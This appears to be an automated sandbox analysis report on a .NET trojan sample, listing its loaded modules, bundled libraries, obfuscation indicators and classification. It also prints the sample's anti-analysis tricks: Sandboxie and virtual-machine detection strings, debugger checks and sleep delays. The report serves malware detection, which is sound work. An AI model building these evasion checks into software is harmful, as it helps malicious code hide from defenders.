                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136FF092_2_0136FF09
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136FFB12_2_0136FFB1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B1F922_2_012B1F92
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01273FD52_2_01273FD5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01273FD22_2_01273FD2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B9EB02_2_012B9EB0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 012F7E54 appears 111 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 0131EA12 appears 86 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 0129B970 appears 280 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 012E5130 appears 58 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 0132F290 appears 105 times
                  Source: file.exe, 00000000.00000002.3051807317.00000000067D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZseobxu.dll" vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000000.2032690755.00000000003DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
                  Source: file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000000.00000002.3035479477.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                  Source: file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.3036442391.00000000027D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                  Source: file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000002.00000002.2500494014.000000000139D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.3812110.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.file.exe.3812110.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.3812110.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.3812110.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: classification engineClassification label: mal88.troj.evad.winEXE@3/0@1/1
                  Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.file.exe.3a89ce8.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.file.exe.3812110.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.3812110.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.3812110.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.38b4d38.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.6cf0000.9.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.file.exe.6aa0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3052844352.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 3148, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A1913 push eax; ret 0_2_069A191D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CDFF0 push es; ret 0_2_069CE0A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C8502 push es; retf 0_2_069C8518
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A29F33 push es; iretd 0_2_06A29F7C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A2B8D8 push es; iretd 0_2_06A2B90C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A28872 push es; retf 0_2_06A2890C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A2B99D push es; iretd 0_2_06A2B9A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A2B97F push es; iretd 0_2_06A2B980
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B5CD86 push ebx; retf 0_2_06B5CD89
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B538F4 push FFFFFF8Bh; ret 0_2_06B538F6
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B5392C push FFFFFF8Bh; ret 0_2_06B53930
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B53945 push FFFFFF8Bh; iretd 0_2_06B53947
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CDD795 push ebp; retf 0_2_06CDD7A1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD5CCF push eax; ret 0_2_06CD5D01
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD1B14 push BA0272B4h; retf 0_2_06CD1B19
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CDE8C1 push es; retf 0_2_06CDE8D8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CDE8D9 push es; retf 0_2_06CDE8D8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD884B push ss; iretd 0_2_06CD884C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD180E push BA0272B4h; ret 0_2_06CD1813
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD1928 push BA0272B4h; retf 0_2_06CD192D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE22C7 push es; retf 0_2_06CE23A4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE96F8 push esp; retf 0_2_06CE9705
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE6E87 push es; retf 0_2_06CE6E90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE062D push es; ret 0_2_06CE0664
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE23A5 push es; iretd 0_2_06CE23C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE2325 push es; retf 0_2_06CE23A4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE58F3 push es; iretd 0_2_06CE5940
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEAC34 push es; ret 0_2_06CEAC50
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E835AF push esi; retf 0_2_06E835B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041A81A push ebx; retf 2_2_0041A823
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041F276 push cs; ret 2_2_0041F29C
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 3148, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 4780000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E096E rdtsc 2_2_012E096E
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.6 %
                  Source: C:\Users\user\Desktop\file.exe TID: 3664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 3664Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 4208Thread sleep count: 312 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 4208Thread sleep count: 169 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 3228Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000Jump to behavior
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: file.exe, 00000000.00000002.3035479477.0000000000947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E096E rdtsc 2_2_012E096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00417983 LdrLoadDll,2_2_00417983
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D0124 mov eax, dword ptr fs:[00000030h]2_2_012D0124
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01360115 mov eax, dword ptr fs:[00000030h]2_2_01360115
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134A118 mov ecx, dword ptr fs:[00000030h]2_2_0134A118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134A118 mov eax, dword ptr fs:[00000030h]2_2_0134A118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134A118 mov eax, dword ptr fs:[00000030h]2_2_0134A118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134A118 mov eax, dword ptr fs:[00000030h]2_2_0134A118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374164 mov eax, dword ptr fs:[00000030h]2_2_01374164
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374164 mov eax, dword ptr fs:[00000030h]2_2_01374164
